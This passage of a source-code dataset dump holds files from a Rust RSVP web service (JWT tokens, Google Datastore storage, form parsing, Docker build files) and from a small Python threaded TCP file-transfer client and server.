&account_data.private_key)\n .expect(\"Error encoding auth token\")\n }\n\n fn render_message(message: &str, error: bool) -> String {\n let div = if error { \"<div style=\\\"color: red\\\">\" } else { \"<div>\" };\n format!(\"{}{}</div><a href=\\\"/\\\">Return home</a>\", div, message)\n }\n\n fn render_form(\n account_data: &AccountData,\n rsvp: Rsvp,\n message_opt: Option<&str>,\n status_code: StatusCode,\n ) -> ResponseFuture {\n let form_file = File::open(\"www/rsvp2.html\").expect(\"failed to open rsvp form template\");\n let mut form_reader = BufReader::new(form_file);\n let mut form_template = String::new();\n form_reader.read_to_string(&mut form_template).expect(\"failed to read form template\");\n\n let guest_file = File::open(\"templates/guest.html\").expect(\"failed to open guest template\");\n let mut guest_reader = BufReader::new(guest_file);\n let mut guest_template = String::new();\n guest_reader.read_to_string(&mut guest_template).expect(\"failed to read guest template\");\n\n let token = RsvpService::get_auth_token(account_data, &rsvp);\n let message = message_opt.unwrap_or(\"\");\n let rendered = match rsvp {\n Rsvp::Empty {\n key: _,\n invited: _,\n invited_count,\n } => {\n let guests = (0..invited_count).fold(\n String::new(),\n |mut guests_builder, guest_num| {\n let rendered_guest = guest_template\n .replace(\"$num\", &(guest_num + 1).to_string())\n .replace(\"$index\", &guest_num.to_string())\n .replace(\"$first_name\", \"\")\n .replace(\"$last_name\", \"\")\n .replace(\"$dietary_notes\", \"\");\n guests_builder.push_str(&rendered_guest);\n guests_builder\n },\n );\n\n form_template\n .replace(\"$message\", message)\n .replace(\"$token\", &token)\n .replace(\"$checked\", \"checked\")\n .replace(\"$guests\", &guests)\n .replace(\"$email\", \"\")\n .replace(\"$other_notes\", \"\")\n },\n\n Rsvp::Full {\n key: _,\n attending,\n email,\n going,\n invited: _,\n other_notes,\n invited_count,\n } => {\n let checked = if going { \"checked\" } else { \"\" };\n let guests = (0..invited_count).fold(\n String::new(),\n |mut guests_builder, guest_num| {\n let attending_opt = attending.get(guest_num as usize);\n let first_name = attending_opt\n .map(|a| a.name.first_name.clone())\n .unwrap_or(\"\".to_string());\n let last_name = attending_opt\n .map(|a| a.name.last_name.clone())\n .unwrap_or(\"\".to_string());\n let dietary_notes = attending_opt\n .map(|a| a.dietary_notes.clone())\n .unwrap_or(\"\".to_string());\n let rendered_guest = guest_template\n .replace(\"$num\", &(guest_num + 1).to_string())\n .replace(\"$index\", &guest_num.to_string())\n .replace(\"$first_name\", &first_name)\n .replace(\"$last_name\", &last_name)\n .replace(\"$dietary_notes\", &dietary_notes);\n guests_builder.push_str(&rendered_guest);\n guests_builder\n },\n );\n\n form_template\n .replace(\"$message\", message)\n .replace(\"$token\", &token)\n .replace(\"$checked\", &checked)\n .replace(\"$guests\", &guests)\n .replace(\"$email\", &email)\n .replace(\"$other_notes\", &other_notes)\n },\n };\n\n let response = server::Response::new()\n .with_status(status_code)\n .with_body(Body::from(rendered));\n Box::new(future::ok(response))\n }\n}\n\nimpl Service for RsvpService {\n type Request = server::Request<Body>;\n type Response = server::Response<Body>;\n type Error = HyperError;\n type Future = Box<Future<Item = Self::Response, Error = Self::Error>>;\n\n fn call(&self, request: Self::Request) -> Self::Future {\n let uri = request.uri().clone();\n println!(\"{} {}\", request.method(), uri);\n\n match request.method() {\n Method::Get => RsvpService::handle_static(uri),\n\n Method::Post => {\n // TODO(jacob): Could we put a lifetime on RsvpService instead of cloning these?\n let account_data_clone_1 = self.account_data.clone();\n let account_data_clone_2 = self.account_data.clone();\n let datastore_client_clone_1 = self.datastore_client.clone();\n let datastore_client_clone_2 = self.datastore_client.clone();\n let rsvp_credentials = self.rsvp_credentials.clone();\n\n let response_future = request.body().concat2().and_then(move |data| {\n let data_str = str::from_utf8(&data).unwrap_or(\n format!(\"unparseable - {:?}\", data).as_str()\n ).to_string();\n println!(\"received POST data: {}\", data_str);\n\n RsvpService::handle_login(\n account_data_clone_1,\n datastore_client_clone_1,\n rsvp_credentials,\n &data,\n ).or_else(move || {\n RsvpService::handle_submission(\n account_data_clone_2,\n datastore_client_clone_2,\n &data,\n )\n }).unwrap_or_else(|| {\n println!(\"invalid POST data: {}\", data_str);\n let response = server::Response::new()\n .with_status(StatusCode::BadRequest)\n .with_body(Body::from(\"Bad Request\"));\n Box::new(future::ok(response))\n })\n });\n Box::new(response_future)\n },\n\n _ => {\n let response = server::Response::new()\n .with_status(StatusCode::MethodNotAllowed)\n .with_body(Body::from(\"Method Not Allowed\"));\n Box::new(future::ok(response))\n },\n }\n }\n}\n\n" }, { "alpha_fraction": 0.5047619342803955, "alphanum_fraction": 0.5071428418159485, "avg_line_length": 31.30769157409668, "blob_id": "c071870008a90b0a8321ab016f00a77e91f7f16e", "content_id": "3c5bd928f36b9754e2cb7ce5cb11f0396e680b7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2100, "license_type": "no_license", "max_line_length": 93, "num_lines": 65, "path": "/src/datastore/client.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use serde_json::Value;\n\nuse model::Rsvp;\n\n#[derive(Debug)]\npub enum RsvpQueryResult {\n NotFound,\n Single(Rsvp),\n Multiple(Vec<Rsvp>),\n}\n\nimpl RsvpQueryResult {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n pub fn from_json(json: &Value) -> RsvpQueryResult {\n json[\"batch\"].get(\"entityResults\").map_or_else(\n || RsvpQueryResult::NotFound,\n |entity_results| {\n let entities = entity_results.as_array().expect(\"invalid query result json\");\n let rsvp_entries = entities\n .into_iter()\n .flat_map(|entity| Rsvp::from_json(entity))\n .collect::<Vec<Rsvp>>();\n match rsvp_entries.as_slice() {\n // NOTE(jacob): This should never happen, unless we get back malformed\n // json from google datastore. In this case we just log what we\n // found and look the other way.\n [] => {\n println!(\"failed to parse query result json: {}\", json);\n RsvpQueryResult::NotFound\n },\n [single] => RsvpQueryResult::Single(single.clone()),\n multiple => RsvpQueryResult::Multiple(multiple.to_vec()),\n }\n },\n )\n }\n}\n\n#[derive(Debug)]\npub struct CommitResult {\n index_updates: Option<u64>,\n version: String,\n}\n\nimpl CommitResult {\n pub fn from_json(json: &Value) -> Option<CommitResult> {\n let version = json\n .get(\"mutationResults\")?\n .as_array()?\n .get(0)?\n .get(\"version\")?\n .as_str()?\n .to_string();\n let index_updates = json.get(\"index_updates\").map_or(\n Some(None),\n |value| value.as_u64().map(|num| Some(num)),\n )?;\n let commit_result = CommitResult {\n index_updates: index_updates,\n version: version,\n };\n Some(commit_result)\n }\n}\n" }, { "alpha_fraction": 0.4954407215118408, "alphanum_fraction": 0.6990881562232971, "avg_line_length": 17.27777862548828, "blob_id": "d6727c13dbd865eafb2b6826a3645a26bfc240c9", "content_id": "a625b9026009e96db85cabb9f083fc44552303ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 329, "license_type": "no_license", "max_line_length": 31, "num_lines": 18, "path": "/requirements.txt", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "cachetools==2.1.0\ncertifi==2018.4.16\nchardet==3.0.4\ngoogle-api-core==1.2.1\ngoogle-auth==1.5.0\ngoogle-cloud-core==0.28.1\ngoogle-cloud-datastore==1.6.0\ngoogleapis-common-protos==1.5.3\ngrpcio==1.12.1\nidna==2.7\nprotobuf==3.6.0\npyasn1==0.4.3\npyasn1-modules==0.2.1\npytz==2018.4\nrequests==2.20.1\nrsa==3.4.2\nsix==1.11.0\nurllib3== 1.24.2\n" }, { "alpha_fraction": 0.39826440811157227, "alphanum_fraction": 0.4002954065799713, "avg_line_length": 44.512603759765625, "blob_id": "ce619570984addf996401add6015b965bf649d33", "content_id": "ba73205661eff53f7f6081d9f44f9261292a791f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 5416, "license_type": "no_license", "max_line_length": 99, "num_lines": 119, "path": "/src/service/form.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use regex::Regex;\nuse std::collections::HashMap;\nuse std::str;\nuse url::form_urlencoded;\n\nenum ParsingFormValue {\n String(String),\n Array(Vec<Option<String>>),\n}\n\n#[derive(Debug)]\npub enum FormValue {\n String(String),\n Array(Vec<String>),\n}\n\nimpl FormValue {\n pub fn as_array(&self) -> Option<Vec<String>> {\n match self {\n FormValue::String(_) => None,\n FormValue::Array(array) => Some(array.to_vec()),\n }\n }\n\n pub fn as_string(&self) -> Option<String> {\n match self {\n FormValue::String(string) => Some(string.to_string()),\n FormValue::Array(_) => None,\n }\n }\n\n /* form_urlencoded::parse does not handle array data correctly, so we define our own\n * helper here.\n *\n * NOTE(jacob): This function takes some liberties with data validation -- in\n * particular, undefined behavior includes:\n * - mixed array and non-array values for a single variable\n * - multiple occurances of the same variable\n * - skipping array indices\n */\n pub fn parse_form_data(form_data: &[u8]) -> HashMap<String, FormValue> {\n // Parse everything into vectors for simplicity, and then do a final pass to convert\n // to the appropriate enum.\n let initial_vector_map: HashMap<String, ParsingFormValue> = HashMap::new();\n // TODO(jacob): figure out how to cache this\n let array_regex = Regex::new(r\"(?P<name>.+)\\[(?P<index>\\d+)\\]\").unwrap();\n\n let vector_map = form_urlencoded::parse(form_data)\n .map(|(name, value)| (name.to_string(), value.to_string()))\n .fold(\n initial_vector_map,\n |mut vector_map, (name, value)| {\n let value1 = value.clone();\n let value2 = value.clone();\n let (var_name, new_value) = array_regex.captures(&name)\n .and_then(|captures| {\n captures.name(\"name\")\n .map(|mat| mat.as_str())\n .and_then(|var_name| {\n captures.name(\"index\").map(|mat| (var_name, mat.as_str()))\n }).and_then(|(var_name, index_str)| {\n str::parse::<usize>(index_str).ok()\n .map(|index| (var_name.to_string(), index))\n })\n }).map_or_else(\n || (name, ParsingFormValue::String(value)),\n |(var_name, index)| {\n let new_parsing_value = vector_map.get(&var_name).map_or_else(\n || {\n let mut new_values = Vec::with_capacity(index + 1);\n new_values.resize(index + 1, None);\n new_values[index] = Some(value1);\n ParsingFormValue::Array(new_values)\n },\n |existing_value| {\n match existing_value {\n ParsingFormValue::String(_) => {\n let mut new_values = Vec::with_capacity(index + 1);\n new_values.resize(index + 1, None);\n new_values[index] = Some(value2);\n ParsingFormValue::Array(new_values)\n },\n ParsingFormValue::Array(values) => {\n let mut new_values = values.clone();\n if new_values.len() <= index {\n new_values.resize(index + 1, None);\n };\n new_values[index] = Some(value2);\n ParsingFormValue::Array(new_values)\n },\n }\n },\n );\n (var_name, new_parsing_value)\n },\n );\n\n vector_map.insert(var_name, new_value);\n vector_map\n }\n );\n\n vector_map.into_iter().flat_map(|(name, value)| {\n match value {\n ParsingFormValue::String(string) => Some((name, FormValue::String(string))),\n ParsingFormValue::Array(values) => {\n let flattened_values = values\n .into_iter()\n .flat_map(|value_opt| value_opt)\n .collect::<Vec<String>>();\n match &flattened_values[..] {\n [] => None, // should never happen with well-formed input\n valid => Some((name, FormValue::Array(valid.to_vec()))),\n }\n }\n }\n }).collect()\n }\n}\n" }, { "alpha_fraction": 0.6271604895591736, "alphanum_fraction": 0.6370370388031006, "avg_line_length": 26, "blob_id": "14d417b71ab1517edbb846746893cd2a6d323e5b", "content_id": "9ad7cdc4c6e3b97308d1091b6e42b8e0d7d0880d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 405, "license_type": "no_license", "max_line_length": 83, "num_lines": 15, "path": "/base.dockerfile", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "FROM nginx:1.15.0\n\nRUN apt-get update && \\\n apt-get -y install curl file gcc gpg libssl-dev pkg-config supervisor wget && \\\n rm -rf /var/lib/apt/lists/* && \\\n wget https://static.rust-lang.org/rustup.sh && \\\n chmod +x rustup.sh && \\\n ./rustup.sh --disable-sudo\n\nCOPY Cargo.* /usr/src/wwww/\nCOPY src /usr/src/wwww/src\n\nWORKDIR /usr/src/wwww\nRUN cargo install --root . && \\\n rm -rf target\n" }, { "alpha_fraction": 0.5200328826904297, "alphanum_fraction": 0.5208553671836853, "avg_line_length": 31.238636016845703, "blob_id": "a7e7066519f798815305a078d923ee59d3db20d2", "content_id": "49dc3bee8344b0f23e70ff7a4b66cfde16793a21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 8511, "license_type": "no_license", "max_line_length": 96, "num_lines": 264, "path": "/src/model/mod.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use jsonwebtoken::{self, Algorithm, Validation};\nuse serde_json::Value;\n\nuse AccountData;\nuse service::form::FormValue;\n\n// TODO(jacob): Use Value::pointer instead of indexing for all of these.\nfn parse_array_value<T>(\n json: &Value,\n value_reader: &Fn(&Value) -> Option<T>\n) -> Option<Vec<T>> {\n json[\"arrayValue\"][\"values\"].as_array().map(|values| {\n values.into_iter().flat_map(value_reader).collect()\n })\n}\n\nfn parse_boolean_value(json: &Value) -> Option<bool> {\n json[\"booleanValue\"].as_bool()\n}\n\nfn parse_integer_value(json: &Value) -> Option<u8> {\n // GCP datastore handles integers encoded as strings.\n json[\"integerValue\"].as_str().and_then(|s| s.parse().ok())\n}\n\nfn parse_string_value(json: &Value) -> Option<String> {\n json[\"stringValue\"].as_str().map(|s| s.to_string())\n}\n\nfn render_array_value<T>(values: &Vec<T>, render_value: &Fn(&T) -> Value) -> Value {\n json!({\n \"arrayValue\": {\n \"values\": Value::Array(values.into_iter().map(render_value).collect()),\n },\n })\n}\n\nfn render_boolean_value(value: &bool, exclude_from_indexes: bool) -> Value {\n json!({\n \"booleanValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\n// GCP datastore handles integers encoded as strings.\nfn render_integer_value(value: &String, exclude_from_indexes: bool) -> Value {\n json!({\n \"integerValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\nfn render_string_value(value: &String, exclude_from_indexes: bool) -> Value {\n json!({\n \"stringValue\": value,\n \"excludeFromIndexes\": exclude_from_indexes,\n })\n}\n\n#[derive(Clone, Debug)]\npub struct Name {\n pub first_name: String,\n pub last_name: String,\n}\n\nimpl Name {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n fn from_json(json: &Value) -> Option<Name> {\n let properties = &json[\"entityValue\"][\"properties\"];\n let first_name = parse_string_value(&properties[\"first_name\"])?;\n let last_name = parse_string_value(&properties[\"last_name\"])?;\n let name = Name {\n first_name: first_name,\n last_name: last_name,\n };\n Some(name)\n }\n\n fn to_json(&self, exclude_from_indexes: bool) -> Value {\n json!({\n \"entityValue\": {\n \"properties\": {\n \"first_name\": render_string_value(&self.first_name, exclude_from_indexes),\n \"last_name\": render_string_value(&self.last_name, exclude_from_indexes),\n },\n },\n })\n }\n}\n\n#[derive(Clone, Debug)]\npub struct Guest {\n pub name: Name,\n pub dietary_notes: String,\n}\n\nimpl Guest {\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n fn from_json(json: &Value) -> Option<Guest> {\n let properties = &json[\"entityValue\"][\"properties\"];\n let name = Name::from_json(&properties[\"name\"])?;\n let dietary_notes = parse_string_value(&properties[\"dietary_notes\"])?;\n let guest = Guest {\n name: name,\n dietary_notes: dietary_notes,\n };\n Some(guest)\n }\n\n fn to_json(&self) -> Value {\n json!({\n \"entityValue\": {\n \"properties\": {\n \"name\": self.name.to_json(true),\n \"dietary_notes\": render_string_value(&self.dietary_notes, true),\n },\n },\n })\n }\n}\n\n// TODO(jacob): Is there some way to de-dupe common fields here?\n#[derive(Clone, Debug)]\npub enum Rsvp {\n /* A database entry for someone who has not yet RSVPed */\n Empty {\n key: Value,\n invited: Vec<Name>,\n invited_count: u8,\n },\n /* A database entry for someone who has RSVPed */\n Full {\n key: Value,\n attending: Vec<Guest>,\n email: String,\n going: bool,\n invited: Vec<Name>,\n other_notes: String,\n invited_count: u8,\n },\n}\n\nimpl Rsvp {\n pub fn from_form_data(\n account_data: &AccountData,\n form_data: &[u8]\n ) -> Option<Rsvp> {\n let params = FormValue::parse_form_data(form_data);\n\n let token = params.get(\"token\")?.as_string()?;\n let token_data = jsonwebtoken::decode::<Value>(\n &token,\n &account_data.public_key,\n &Validation::new(Algorithm::RS256),\n ).ok()?.claims;\n\n let key = token_data.get(\"key\")?.clone();\n let invited = parse_array_value(&token_data[\"invited\"], &Name::from_json)?;\n let invited_count = parse_integer_value(&token_data[\"invited_count\"])?;\n\n let first_names = params.get(\"first_name\")?.as_array()?;\n let last_names = params.get(\"last_name\")?.as_array()?;\n let dietary_noteses = params.get(\"dietary_notes\")?.as_array()?;\n let attending = first_names.into_iter().zip(last_names).zip(dietary_noteses)\n .map(|((first_name, last_name), dietary_notes)| {\n Guest {\n name: Name {\n first_name: first_name,\n last_name: last_name,\n },\n dietary_notes: dietary_notes,\n }\n }).collect();\n\n let email = params.get(\"email\")?.as_string()?;\n let going = params.get(\"going\")\n .map_or(Some(false), |going_param| Some(going_param.as_string()? == \"yes\"))?;\n let other_notes = params.get(\"other_notes\")?.as_string()?;\n\n let full_rsvp = Rsvp::Full {\n key: key,\n attending: attending,\n email: email,\n invited: invited,\n going: going,\n other_notes: other_notes,\n invited_count: invited_count,\n };\n Some(full_rsvp)\n }\n\n // TODO(jacob): Figure out how to define Deserialize/Serialize for the datastore json\n // format.\n pub fn from_json(json: &Value) -> Option<Rsvp> {\n let key = json[\"entity\"][\"key\"].clone();\n let properties = &json[\"entity\"][\"properties\"];\n let invited = parse_array_value(&properties[\"invited\"], &Name::from_json)?;\n let invited_count = parse_integer_value(&properties[\"invited_count\"])?;\n\n match parse_boolean_value(&properties[\"going\"]) {\n None => {\n let empty_rsvp = Rsvp::Empty {\n key: key,\n invited: invited,\n invited_count: invited_count,\n };\n Some(empty_rsvp)\n },\n\n Some(going) => {\n let attending = parse_array_value(&properties[\"attending\"], &Guest::from_json)?;\n let email = parse_string_value(&properties[\"email\"])?;\n let other_notes = parse_string_value(&properties[\"other_notes\"])?;\n\n let full_rsvp = Rsvp::Full {\n key: key,\n attending: attending,\n email: email,\n going: going,\n invited: invited,\n other_notes: other_notes,\n invited_count: invited_count,\n };\n Some(full_rsvp)\n },\n }\n }\n\n pub fn to_json(&self) -> Value {\n match self {\n Rsvp::Empty {\n key,\n invited,\n invited_count,\n } => json!({\n \"key\": key,\n \"invited\": render_array_value(&invited, &|name| name.to_json(false)),\n \"invited_count\": render_integer_value(&invited_count.to_string(), true),\n }),\n\n Rsvp::Full {\n key,\n attending,\n email,\n going,\n invited,\n other_notes,\n invited_count,\n } => json!({\n \"key\": key,\n \"properties\": {\n \"attending\": render_array_value(&attending, &|guest| guest.to_json()),\n \"email\": render_string_value(&email, true),\n \"invited\": render_array_value(&invited, &|name| name.to_json(false)),\n \"going\": render_boolean_value(&going, false),\n \"other_notes\": render_string_value(&other_notes, true),\n \"invited_count\": render_integer_value(&invited_count.to_string(), true),\n },\n }),\n }\n }\n}\n" }, { "alpha_fraction": 0.5928041338920593, "alphanum_fraction": 0.595088541507721, "avg_line_length": 30.836362838745117, "blob_id": "a6971d41702409591fcad35aa105ef9816e13c4c", "content_id": "7801ccd14edacac88317b6da0cf10a1faed8bbbe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1751, "license_type": "no_license", "max_line_length": 79, "num_lines": 55, "path": "/scripts/export.py", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "from argparse import ArgumentParser, FileType\nfrom google.cloud import datastore\n\n\ndef parse_args():\n parser = ArgumentParser('Export RSVP data to a .tsv file')\n parser.add_argument('destination', type=FileType('w', encoding='UTF-8'))\n return parser.parse_args()\n\ndef sanitize_string(string):\n return string.replace('\\n', '\\\\n').replace('\\r', '\\\\r').replace('\\t', '\\\\t')\n\ndef main():\n args = parse_args()\n datastore_client = datastore.Client()\n max_attendees = 0\n lines = []\n\n query = datastore_client.query(kind='rsvp')\n for rsvp in query.fetch():\n if 'going' in rsvp:\n going = rsvp['going']\n invited = ', '.join((\n '{} {}'.format(\n sanitize_string(invited['first_name']),\n sanitize_string(invited['last_name']),\n ) for invited in rsvp['invited']\n ))\n line = '{}\\t{}'.format(going, invited)\n\n if going:\n count = len(rsvp['attending'])\n email = sanitize_string(rsvp['email'])\n other_notes = sanitize_string(rsvp['other_notes'])\n line += '\\t{}\\t{}\\t{}'.format(count, email, other_notes)\n\n for attendee in rsvp['attending']:\n line += '\\t{}\\t{}\\t{}'.format(\n sanitize_string(attendee['name']['first_name']),\n sanitize_string(attendee['name']['last_name']),\n sanitize_string(attendee['dietary_notes']),\n )\n max_attendees = max(max_attendees, count)\n\n lines.append(line + '\\n')\n\n header = 'going\\tinvited\\tcount\\temail(s)\\tother_notes'\n for i in range(1, max_attendees + 1):\n header += '\\tfirst_name {}\\tlast_name {}\\tdietary_notes {}'.format(i, i, i)\n args.destination.write(header + '\\n')\n for line in lines:\n args.destination.write(line)\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7710145115852356, "alphanum_fraction": 0.7710145115852356, "avg_line_length": 27.75, "blob_id": "7d5b6d1be2e518fcadb318ab02d2c643d1f4e030", "content_id": "ec9a0858b24a3a7f99fa71b1ee36409438f41d28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 345, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/app.dockerfile", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "FROM wwww-base:test\n\nCOPY nginx.conf /etc/nginx/nginx.conf\nCOPY supervisord.conf /etc/supervisor/supervisord.conf\n\nCOPY keys /usr/src/wwww/keys\nCOPY www /usr/src/wwww/www\nCOPY templates /usr/src/wwww/templates\n\nRUN rm -r /usr/share/nginx/html && ln -s /usr/src/wwww/www /usr/share/nginx/html\n\nCMD supervisord -c /etc/supervisor/supervisord.conf\n" }, { "alpha_fraction": 0.43573668599128723, "alphanum_fraction": 0.5799372792243958, "avg_line_length": 16.72222137451172, "blob_id": "7b63d33fe7872ce6c8ca9ff575483f1e57cf6bf2", "content_id": "e453ab62bd0d038bbf0252c08f8d6f07e8c31fa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 319, "license_type": "no_license", "max_line_length": 29, "num_lines": 18, "path": "/Cargo.toml", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "[package]\nname = \"wwww\"\nversion = \"0.2.0\"\nauthors = [\"jacob <[email protected]>\"]\n\n[dependencies]\nbytes = \"0.4.8\"\nfutures = \"0.1.21\"\nhyper = \"0.11.27\"\nhyper-tls = \"0.1.3\"\nitertools = \"0.7.8\"\njsonwebtoken = \"4.0.1\"\nregex = \"1.0.0\"\nserde = \"1.0.66\"\nserde_derive = \"1.0.66\"\nserde_json = \"1.0.19\"\ntokio-core = \"0.1.11\"\nurl = \"1.7.0\"\n" } ]
11
IppikiOukami/TCP_Framing
https://github.com/IppikiOukami/TCP_Framing
1ee0f365df8909b2c901efc99ee65e3e895b714e
3a4c598374b0a22cf46b0bc98de89dbfc84dbb02
16a79389885714e32cb495e592ebab55a7ea3940
refs/heads/master
2023-05-06T09:44:18.808136
2021-05-03T00:52:59
2021-05-03T00:52:59
369,058,436
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5747554898262024, "alphanum_fraction": 0.5850023031234741, "avg_line_length": 26.5256404876709, "blob_id": "bcfc84ab4e53f1d541f282e5e05e76a5006843da", "content_id": "d2d9602db7a9d401cf41ea06c26bdbbffb87e567", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2147, "license_type": "no_license", "max_line_length": 92, "num_lines": 78, "path": "/framing/client.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re, time, os\nimport framedSocket\nimport workerThread\nfrom myIO import myReadLine\nsys.path.append(\"../lib\")\nimport params\n\nswitchesVarDefaults = (\n (('-s', '--server'), 'server', \"127.0.0.1:50001\"),\n (('-d', '--delay'), 'delay', \"0\"),\n (('-?', '--usage'), \"usage\", False), # boolean (set if present)\n )\n\nprogname = \"echoclient\"\nparamMap = params.parseParams(switchesVarDefaults)\nserver, usage = paramMap[\"server\"], paramMap[\"usage\"]\n\nif usage:\n params.usage()\n \ntry:\n serverHost, serverPort = re.split(\":\", server)\n serverPort = int(serverPort)\nexcept:\n print(\"Can't parse server:port from '%s'\" % server)\n sys.exit(1)\n \ns = None\nfor res in socket.getaddrinfo(serverHost, serverPort, socket.AF_UNSPEC, socket.SOCK_STREAM):\n af, socktype, proto, canonname, sa = res\n try:\n print(\"creating sock: af=%d, type=%d, proto=%d\" % (af, socktype, proto))\n s = socket.socket(af, socktype, proto)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s = None\n continue\n try:\n print(\" attempting to connect to %s\" % repr(sa))\n s.connect(sa)\n except socket.error as msg:\n print(\" error: %s\" % msg)\n s.close()\n s = None\n continue\n break\n \nif s is None:\n print('could not open socket')\n sys.exit(1)\n\ndelay = float(paramMap['delay'])\nif delay:\n print(f'sleeping for {delay}s')\n time.sleep(delay)\n print('done sleeping')\n \nframedSock = framedSocket.Framed_Socket(s)\n\nfileName = os.read(0,1024).decode().strip()\nprint(f'Sending {fileName}...')\nframedSock.tx(fileName.encode())\nif fileName == 'QUIT':\n print(\"Quitting...\")\n sys.exit(1)\nserverReply = framedSock.rx()\n\nprint(f\"Server response:{serverReply}\\n \")\n\n\nif serverReply == \"OK\":\n fd = open(('./files/'+fileName),'r') #open file to be sent\n content = fd.read()\n fd.close()\n framedSock.tx(content.encode())\nelse:\n os.write(2,(\"Error\").encode()) #if the file already exists then print error\n sys.exit(1)\n" }, { "alpha_fraction": 0.5207268595695496, "alphanum_fraction": 0.522430419921875, "avg_line_length": 31.61111068725586, "blob_id": "3733dda5f4a1a75b78446a1180730aafcdb0df16", "content_id": "6221417be3e954855c5cfbfb95456f6d357d006b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1761, "license_type": "no_license", "max_line_length": 79, "num_lines": 54, "path": "/framing/workerThread.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re, os\nimport framedSocket\nsys.path.append(\"../lib\")\nimport params\nimport threading\nfrom threading import Thread\n\nthreadNum = 0\nlock = threading.Lock()\n\nclass Worker(Thread):\n def __init__(self,conn=None,addr=None):\n global threadNum\n Thread.__init__(self, name = \"Thread-%d\" % threadNum)\n threadNum += 1\n self.conn = conn\n self.addr = addr\n\n def checkTransfer(self, fileName,fileSet):\n global lock\n canUse = True\n lock.acquire() #lock the thread\n if fileName in fileSet: #file in use\n canUse = False\n lock.release() #unlock it\n return canUse\n\n def start(self,fileSet):\n framedSock = framedSocket.Framed_Socket(self.conn)\n fileName = framedSock.rx()\n if fileName == \"QUIT\":\n self.conn.shutdown(socket.SHUT_WR)\n sys.exit(1)\n filePath = './receivedFiles/' + fileName\n canUse = self.checkTransfer(filePath,fileSet)\n if not canUse:\n framedSock.tx(b'WAIT')\n elif os.path.isfile(filePath):\n framedSock.tx(b'File already in receivedFiles')\n else:\n framedSock.tx(b'OK')\n try:\n fd = open(filePath, \"w\")\n data = framedSock.rx()\n print('Writting: ',data)\n fd.write(data)\n fd.close()\n print(\"Complete\")\n except:\n print(f\"Error writing into file at {filePath}\")\n self.conn.shutdown(socket.SHUT_WR)\n return None\n self.conn.shutdown(socket.SHUT_WR)\n return fileName\n" }, { "alpha_fraction": 0.4256465435028076, "alphanum_fraction": 0.4396551847457886, "avg_line_length": 29.933332443237305, "blob_id": "b68c83d0301bf3dca775be2c9fa95889bcfce393", "content_id": "4bdb75c1f1a61d7da3926523563453c06504a29d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 73, "num_lines": 30, "path": "/framing/myIO.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "from os import read\n\nlimit = 0\nindex = 0\n\ndef myGetChar(): #reads input char by char\n global limit\n global index\n if index == limit:\n index = 0\n limit = read(0,1000) # fills array from input\n if limit == 0: # nothing to read\n return \"EOF\"\n if index < len(limit) - 1: # Avoids out of bounds\n character = chr(limit[index])\n index +=1\n return character\n else: # reached end of input\n return \"EOF\"\ndef myReadLine():\n global limit\n global index\n line = \"\"\n character = myGetChar() \n while character!='' and character!= \"EOF\":\n line += character \n character = myGetChar()\n index = 0\n limit = 0\n return line\n" }, { "alpha_fraction": 0.6007509231567383, "alphanum_fraction": 0.6082603335380554, "avg_line_length": 27.464284896850586, "blob_id": "56a6a0faa775c9f6d2da38541f54c8de55cb24d7", "content_id": "86cce4f6f1f07953496eb83819189297b42a87c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 799, "license_type": "no_license", "max_line_length": 92, "num_lines": 28, "path": "/framing/server.py", "repo_name": "IppikiOukami/TCP_Framing", "src_encoding": "UTF-8", "text": "import socket, sys, re\nimport workerThread\nsys.path.append(\"../lib\")\nimport params\n\nswitchesVarDefaults = (\n (('-l', '--listenPort') ,'listenPort', 50001),\n (('-?', '--usage'), \"usage\", False), \n )\n\nprogname = \"echoserver\"\nparamMap = params.parseParams(switchesVarDefaults)\n\nlistenPort = paramMap['listenPort']\nlistenAddr = '' \n\nif paramMap['usage']:\n params.usage()\nfileSet = set()\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((listenAddr, listenPort))\ns.listen(1)\n\nwhile True:\n print(f\"Waiting on client...\")\n conn, addr = s.accept() # wait for incoming connection request\n print(f\"Connected to client: {addr}\\n\")\n fileSet.add(workerThread.Worker(conn,addr).start(fileSet))\n \n" } ]
4
luozhouyang/datas
